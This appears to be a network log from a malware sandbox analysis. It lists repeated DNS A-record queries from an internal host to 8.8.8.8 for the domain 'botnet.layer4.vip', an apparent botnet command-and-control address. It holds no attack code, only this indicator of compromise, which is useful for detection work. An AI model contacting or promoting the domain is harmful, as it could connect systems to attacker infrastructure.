                                  Apr 9, 2023 03:31:51.321537971 CEST192.168.2.238.8.8.80x436fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.337476015 CEST192.168.2.238.8.8.80xe4deStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.361917019 CEST192.168.2.238.8.8.80xe4deStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.377481937 CEST192.168.2.238.8.8.80xe4deStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.393330097 CEST192.168.2.238.8.8.80xe4deStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.417447090 CEST192.168.2.238.8.8.80xe4deStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.433430910 CEST192.168.2.238.8.8.80x238aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.449327946 CEST192.168.2.238.8.8.80x238aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.473778963 CEST192.168.2.238.8.8.80x238aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.489691019 CEST192.168.2.238.8.8.80x238aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.505553961 CEST192.168.2.238.8.8.80x238aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.529980898 CEST192.168.2.238.8.8.80x490cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.545660973 CEST192.168.2.238.8.8.80x490cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.561479092 CEST192.168.2.238.8.8.80x490cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.577131987 CEST192.168.2.238.8.8.80x490cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.601280928 CEST192.168.2.238.8.8.80x490cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.625391006 CEST192.168.2.238.8.8.80x326aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.649544001 CEST192.168.2.238.8.8.80x326aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.674066067 CEST192.168.2.238.8.8.80x326aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.698640108 CEST192.168.2.238.8.8.80x326aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.714966059 CEST192.168.2.238.8.8.80x326aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.730642080 CEST192.168.2.238.8.8.80x61f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.754822969 CEST192.168.2.238.8.8.80x61f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.770486116 CEST192.168.2.238.8.8.80x61f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.795933962 CEST192.168.2.238.8.8.80x61f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.811430931 CEST192.168.2.238.8.8.80x61f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.835913897 CEST192.168.2.238.8.8.80xe3ccStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.851485968 CEST192.168.2.238.8.8.80xe3ccStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.875926971 CEST192.168.2.238.8.8.80xe3ccStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.891550064 CEST192.168.2.238.8.8.80xe3ccStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.916313887 CEST192.168.2.238.8.8.80xe3ccStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.932446003 CEST192.168.2.238.8.8.80xe780Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.956949949 CEST192.168.2.238.8.8.80xe780Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.974091053 CEST192.168.2.238.8.8.80xe780Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.998390913 CEST192.168.2.238.8.8.80xe780Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.022943974 CEST192.168.2.238.8.8.80xe780Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.039227962 CEST192.168.2.238.8.8.80x2856Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.063388109 CEST192.168.2.238.8.8.80x2856Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.079118967 CEST192.168.2.238.8.8.80x2856Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.103770971 CEST192.168.2.238.8.8.80x2856Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.119435072 CEST192.168.2.238.8.8.80x2856Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.144119024 CEST192.168.2.238.8.8.80xe2cdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.168735027 CEST192.168.2.238.8.8.80xe2cdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.184406042 CEST192.168.2.238.8.8.80xe2cdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.208553076 CEST192.168.2.238.8.8.80xe2cdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.224462032 CEST192.168.2.238.8.8.80xe2cdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.249027967 CEST192.168.2.238.8.8.80xf8d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.264694929 CEST192.168.2.238.8.8.80xf8d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.283579111 CEST192.168.2.238.8.8.80xf8d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.307673931 CEST192.168.2.238.8.8.80xf8d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.323208094 CEST192.168.2.238.8.8.80xf8d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.339283943 CEST192.168.2.238.8.8.80x2cf0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.363677979 CEST192.168.2.238.8.8.80x2cf0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.379826069 CEST192.168.2.238.8.8.80x2cf0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.395461082 CEST192.168.2.238.8.8.80x2cf0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.411427975 CEST192.168.2.238.8.8.80x2cf0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.427232981 CEST192.168.2.238.8.8.80x5292Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.451884031 CEST192.168.2.238.8.8.80x5292Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.476035118 CEST192.168.2.238.8.8.80x5292Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.500166893 CEST192.168.2.238.8.8.80x5292Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.515995026 CEST192.168.2.238.8.8.80x5292Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.540575027 CEST192.168.2.238.8.8.80x3bf4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.565603971 CEST192.168.2.238.8.8.80x3bf4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.590276957 CEST192.168.2.238.8.8.80x3bf4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.614450932 CEST192.168.2.238.8.8.80x3bf4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.630402088 CEST192.168.2.238.8.8.80x3bf4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.654731989 CEST192.168.2.238.8.8.80xeaa9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.679239988 CEST192.168.2.238.8.8.80xeaa9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.695188999 CEST192.168.2.238.8.8.80xeaa9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.712182045 CEST192.168.2.238.8.8.80xeaa9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.736349106 CEST192.168.2.238.8.8.80xeaa9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.760714054 CEST192.168.2.238.8.8.80xba96Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.786638021 CEST192.168.2.238.8.8.80xba96Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.802309990 CEST192.168.2.238.8.8.80xba96Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.818538904 CEST192.168.2.238.8.8.80xba96Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.845220089 CEST192.168.2.238.8.8.80xba96Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.861964941 CEST192.168.2.238.8.8.80xa40bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.886590004 CEST192.168.2.238.8.8.80xa40bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.903377056 CEST192.168.2.238.8.8.80xa40bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.920222044 CEST192.168.2.238.8.8.80xa40bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.945980072 CEST192.168.2.238.8.8.80xa40bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.970484972 CEST192.168.2.238.8.8.80xcfa5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.987106085 CEST192.168.2.238.8.8.80xcfa5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.012562990 CEST192.168.2.238.8.8.80xcfa5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.029634953 CEST192.168.2.238.8.8.80xcfa5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.054251909 CEST192.168.2.238.8.8.80xcfa5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.078968048 CEST192.168.2.238.8.8.80xc75bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.103383064 CEST192.168.2.238.8.8.80xc75bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.127607107 CEST192.168.2.238.8.8.80xc75bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.143331051 CEST192.168.2.238.8.8.80xc75bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.167928934 CEST192.168.2.238.8.8.80xc75bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.184098005 CEST192.168.2.238.8.8.80x3f04Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.199680090 CEST192.168.2.238.8.8.80x3f04Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.215374947 CEST192.168.2.238.8.8.80x3f04Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.230994940 CEST192.168.2.238.8.8.80x3f04Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.255213976 CEST192.168.2.238.8.8.80x3f04Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.279445887 CEST192.168.2.238.8.8.80x4777Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.303978920 CEST192.168.2.238.8.8.80x4777Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.328314066 CEST192.168.2.238.8.8.80x4777Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.352453947 CEST192.168.2.238.8.8.80x4777Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.376962900 CEST192.168.2.238.8.8.80x4777Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.392769098 CEST192.168.2.238.8.8.80x6648Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.408536911 CEST192.168.2.238.8.8.80x6648Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.425649881 CEST192.168.2.238.8.8.80x6648Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.441683054 CEST192.168.2.238.8.8.80x6648Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.465817928 CEST192.168.2.238.8.8.80x6648Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.490401983 CEST192.168.2.238.8.8.80x8255Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.506315947 CEST192.168.2.238.8.8.80x8255Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.530788898 CEST192.168.2.238.8.8.80x8255Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.546688080 CEST192.168.2.238.8.8.80x8255Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.571012974 CEST192.168.2.238.8.8.80x8255Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.586977005 CEST192.168.2.238.8.8.80x18f1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.602983952 CEST192.168.2.238.8.8.80x18f1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.618953943 CEST192.168.2.238.8.8.80x18f1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.643152952 CEST192.168.2.238.8.8.80x18f1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.658724070 CEST192.168.2.238.8.8.80x18f1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.683181047 CEST192.168.2.238.8.8.80x4d71Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.700232983 CEST192.168.2.238.8.8.80x4d71Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.716213942 CEST192.168.2.238.8.8.80x4d71Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.740380049 CEST192.168.2.238.8.8.80x4d71Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.764507055 CEST192.168.2.238.8.8.80x4d71Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.780817986 CEST192.168.2.238.8.8.80xf387Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.805295944 CEST192.168.2.238.8.8.80xf387Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.829807997 CEST192.168.2.238.8.8.80xf387Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.845755100 CEST192.168.2.238.8.8.80xf387Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.870167971 CEST192.168.2.238.8.8.80xf387Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.886991024 CEST192.168.2.238.8.8.80x15f9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.911654949 CEST192.168.2.238.8.8.80x15f9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.936063051 CEST192.168.2.238.8.8.80x15f9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.951533079 CEST192.168.2.238.8.8.80x15f9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.967003107 CEST192.168.2.238.8.8.80x15f9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.983581066 CEST192.168.2.238.8.8.80xaf90Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.008373976 CEST192.168.2.238.8.8.80xaf90Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.032435894 CEST192.168.2.238.8.8.80xaf90Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.047966957 CEST192.168.2.238.8.8.80xaf90Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.072388887 CEST192.168.2.238.8.8.80xaf90Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.089289904 CEST192.168.2.238.8.8.80xd423Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.115161896 CEST192.168.2.238.8.8.80xd423Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.139725924 CEST192.168.2.238.8.8.80xd423Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.155270100 CEST192.168.2.238.8.8.80xd423Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.179686069 CEST192.168.2.238.8.8.80xd423Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.205440998 CEST192.168.2.238.8.8.80x1fcdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.232064962 CEST192.168.2.238.8.8.80x1fcdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.256460905 CEST192.168.2.238.8.8.80x1fcdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.271987915 CEST192.168.2.238.8.8.80x1fcdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.287764072 CEST192.168.2.238.8.8.80x1fcdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.312859058 CEST192.168.2.238.8.8.80xca87Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.336983919 CEST192.168.2.238.8.8.80xca87Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.352503061 CEST192.168.2.238.8.8.80xca87Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.368408918 CEST192.168.2.238.8.8.80xca87Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.383903980 CEST192.168.2.238.8.8.80xca87Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.399977922 CEST192.168.2.238.8.8.80xaf4fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.416024923 CEST192.168.2.238.8.8.80xaf4fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.440083981 CEST192.168.2.238.8.8.80xaf4fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.464221954 CEST192.168.2.238.8.8.80xaf4fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.480168104 CEST192.168.2.238.8.8.80xaf4fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.496105909 CEST192.168.2.238.8.8.80x7778Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.520261049 CEST192.168.2.238.8.8.80x7778Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.535845995 CEST192.168.2.238.8.8.80x7778Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.551748991 CEST192.168.2.238.8.8.80x7778Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.567353964 CEST192.168.2.238.8.8.80x7778Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.592670918 CEST192.168.2.238.8.8.80xcc10Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.608392000 CEST192.168.2.238.8.8.80xcc10Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.632826090 CEST192.168.2.238.8.8.80xcc10Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.657008886 CEST192.168.2.238.8.8.80xcc10Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.681320906 CEST192.168.2.238.8.8.80xcc10Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.697880983 CEST192.168.2.238.8.8.80x293fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.721992016 CEST192.168.2.238.8.8.80x293fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.737854958 CEST192.168.2.238.8.8.80x293fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.761976957 CEST192.168.2.238.8.8.80x293fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.777632952 CEST192.168.2.238.8.8.80x293fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.793193102 CEST192.168.2.238.8.8.80x3883Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.809045076 CEST192.168.2.238.8.8.80x3883Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.833298922 CEST192.168.2.238.8.8.80x3883Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.857835054 CEST192.168.2.238.8.8.80x3883Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.873763084 CEST192.168.2.238.8.8.80x3883Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.889596939 CEST192.168.2.238.8.8.80xb8c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.914073944 CEST192.168.2.238.8.8.80xb8c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.929964066 CEST192.168.2.238.8.8.80xb8c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.954380035 CEST192.168.2.238.8.8.80xb8c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.978427887 CEST192.168.2.238.8.8.80xb8c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.002620935 CEST192.168.2.238.8.8.80x5f96Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.018150091 CEST192.168.2.238.8.8.80x5f96Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.033791065 CEST192.168.2.238.8.8.80x5f96Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.057889938 CEST192.168.2.238.8.8.80x5f96Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.082076073 CEST192.168.2.238.8.8.80x5f96Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.098141909 CEST192.168.2.238.8.8.80xe87dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.113742113 CEST192.168.2.238.8.8.80xe87dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.138212919 CEST192.168.2.238.8.8.80xe87dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.154182911 CEST192.168.2.238.8.8.80xe87dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.178662062 CEST192.168.2.238.8.8.80xe87dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.194711924 CEST192.168.2.238.8.8.80x9c0fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.210385084 CEST192.168.2.238.8.8.80x9c0fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.234810114 CEST192.168.2.238.8.8.80x9c0fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.250742912 CEST192.168.2.238.8.8.80x9c0fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.275130987 CEST192.168.2.238.8.8.80x9c0fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.299246073 CEST192.168.2.238.8.8.80xa0a2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
